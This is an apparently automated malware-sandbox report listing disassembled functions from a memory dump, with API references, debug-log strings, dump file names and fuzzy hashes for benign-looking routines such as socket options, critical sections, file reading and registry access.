Function 00007FFE11EC247A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11EC24AA
WSAGetLastError.WS2_32 ref: 00007FFE11EC24C1

Strings

tcp_set_nodelay, xrefs: 00007FFE11EC24D1
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC24D8

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 1b536b85b17edd9e88145d2e943b27abcefec6fa7ca45e2336afdb1562b0314e
Instruction ID: 042094c68beb3474147c7788146f97bbd06614ad46a626e4902452c998e4fdbf
Opcode Fuzzy Hash: 1b536b85b17edd9e88145d2e943b27abcefec6fa7ca45e2336afdb1562b0314e
Instruction Fuzzy Hash: B2F0F661A0895386F7105F9BAC006A76564BB84370F445271ED2D837B4DE3CE545C700

Function 00007FFE11501780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE115017B9
LeaveCriticalSection.KERNEL32 ref: 00007FFE1150183B

Strings

ebus_dispatch, xrefs: 00007FFE1150180A
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11501811

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 15deaf317dfdc4194d1a2c5d5cc6eeccf94406a9381b31fdac7c3786365024c8
Instruction ID: b169f10dce7cad577dbdce311b9cd7aa3a0dfbfec96b5a4d590633705260a92f
Opcode Fuzzy Hash: 15deaf317dfdc4194d1a2c5d5cc6eeccf94406a9381b31fdac7c3786365024c8
Instruction Fuzzy Hash: 96214D32A09F8286EB618F66E88016C73A9FB44BA4F544179DE4D877B8DF3CE941C701

Function 00007FFE0EB4EE60 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EB4EE99
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4EF1B

Strings

ebus_dispatch, xrefs: 00007FFE0EB4EEEA
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EB4EEF1

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
Instruction ID: 1afcc7de5b9a81d86a42b0014893e3bfe4a033ec4e46f5a9b3cf3c1b9785655c
Opcode Fuzzy Hash: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
Instruction Fuzzy Hash: BA21F972A18B8682EB709F15E840179A7A0FB84B98F144135DEDD8B778DF3CE891CB00

Function 00007FFE0E161780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E1617B9
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16183B

Strings

ebus_dispatch, xrefs: 00007FFE0E16180A
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E161811

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
Instruction ID: 1a072dc581b9dbf8eb64d4abab22adee32291fa74f6bed5571f0b81899f1d2e3
Opcode Fuzzy Hash: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
Instruction Fuzzy Hash: 27213B32A0AA8696EB609F25F84016967A4FB84B94B144136DEDD87A78DF3CE981C700

Function 00007FF76A9027ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e20fdda9aecabaff660814530ca962a529c68a4245ba61236c39f773432a8f69
Instruction ID: 4fbea147e4450deff69d3dd722b25b49b5c01f2accf3a922fce28d5a7f902fab
Opcode Fuzzy Hash: e20fdda9aecabaff660814530ca962a529c68a4245ba61236c39f773432a8f69
Instruction Fuzzy Hash: 2DF0BE23B08303C1FA63BA14B4403B891412F403A4EF905F9CE5C8B2C1AE3DA887D220

Function 00007FF76A902801 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c36b2bfec06eeb17a3fd2f8c90e0578e5cf6d39e4ee124647ec2c8155529b552
Instruction ID: 2e12be60a329cb47a6c94904791ee4ab994cf2bdee69abc5170b3225ac8b80d7
Opcode Fuzzy Hash: c36b2bfec06eeb17a3fd2f8c90e0578e5cf6d39e4ee124647ec2c8155529b552
Instruction Fuzzy Hash: AFF0BE23B08303C1FA63BA14B4413B991412F403A8EF905F9CE588B2C1AE3DAC87D220

Function 00007FF76A9027F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 99c49add896dd6c0c48605ffd0389eb332d1844b1e609faf413420c8f4f72ec4
Instruction ID: 8cad9e5bbc1d6dcb9d59d2e611d4d5a9093abc3ad782cd87f7cebba186b4b2f2
Opcode Fuzzy Hash: 99c49add896dd6c0c48605ffd0389eb332d1844b1e609faf413420c8f4f72ec4
Instruction Fuzzy Hash: 20F0BE23B08303C5FA63BA14B4503B891412F403A8EF905F9CE588B2C1AE3DAC87D220

Function 00007FF76A9026B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
Instruction ID: 46078f73b1d35958df193122b7e6a965fb923a2ab19393a83d2d11e4d2cd7fe1
Opcode Fuzzy Hash: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
Instruction Fuzzy Hash: 1DF0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DAC87C220

Function 00007FF76A9026AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
Instruction ID: 8822b9713c619f2c3a26336ecd2139106f08d61354fc072cf0d03b5cb99d0a2a
Opcode Fuzzy Hash: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
Instruction Fuzzy Hash: D7F0BE27B08303C1FA63BA04B4413B991012F403A8EF905F9CE588B2C1AE3DAC87C220

Function 00007FF76A9026A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
Instruction ID: c8f3f5668c6cd4f0d4d2cf8c8735d0435124c002965e53a0d8cacf77eb8e6dba
Opcode Fuzzy Hash: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
Instruction Fuzzy Hash: C8F0BE27B08303C5FA63BA04B4503B891012F403A8EF905F9CE588B2C1AE3DAC87C220

Function 00007FF76A90269D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
Instruction ID: c0d52b9f819b009bda4879c663ef708a22df11703de63fa65cba97d145c3b066
Opcode Fuzzy Hash: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
Instruction Fuzzy Hash: C9F0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DA887C220

Function 00007FF76A9026D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
Instruction ID: c0d52b9f819b009bda4879c663ef708a22df11703de63fa65cba97d145c3b066
Opcode Fuzzy Hash: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
Instruction Fuzzy Hash: C9F0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DA887C220

Function 00007FF76A9026B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
Instruction ID: f1e25f974b0ed77a6e6ef67eb33d3cb1c71db238355699c7880cab1ed8648af5
Opcode Fuzzy Hash: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
Instruction Fuzzy Hash: 00F0BE27B08303C1FA63BA04B4403B891012F403A8EF905FACE588B2C1AE3DAC87C220

Function 00007FF76A9026F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
Instruction ID: f1e25f974b0ed77a6e6ef67eb33d3cb1c71db238355699c7880cab1ed8648af5
Opcode Fuzzy Hash: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
Instruction Fuzzy Hash: 00F0BE27B08303C1FA63BA04B4403B891012F403A8EF905FACE588B2C1AE3DAC87C220

Function 00007FF76A9026EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
Instruction ID: 46078f73b1d35958df193122b7e6a965fb923a2ab19393a83d2d11e4d2cd7fe1
Opcode Fuzzy Hash: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
Instruction Fuzzy Hash: 1DF0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DAC87C220

Function 00007FF76A9026E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
Instruction ID: 8822b9713c619f2c3a26336ecd2139106f08d61354fc072cf0d03b5cb99d0a2a
Opcode Fuzzy Hash: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
Instruction Fuzzy Hash: D7F0BE27B08303C1FA63BA04B4413B991012F403A8EF905F9CE588B2C1AE3DAC87C220

Function 00007FF76A9026DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902759
fs_file_read, xrefs: 00007FF76A902752

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
Instruction ID: c8f3f5668c6cd4f0d4d2cf8c8735d0435124c002965e53a0d8cacf77eb8e6dba
Opcode Fuzzy Hash: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
Instruction Fuzzy Hash: C8F0BE27B08303C5FA63BA04B4503B891012F403A8EF905F9CE588B2C1AE3DAC87C220

Function 00007FF76A9058AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF76A9058CD

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A90591D
registry_get_value, xrefs: 00007FF76A905916

Memory Dump Source

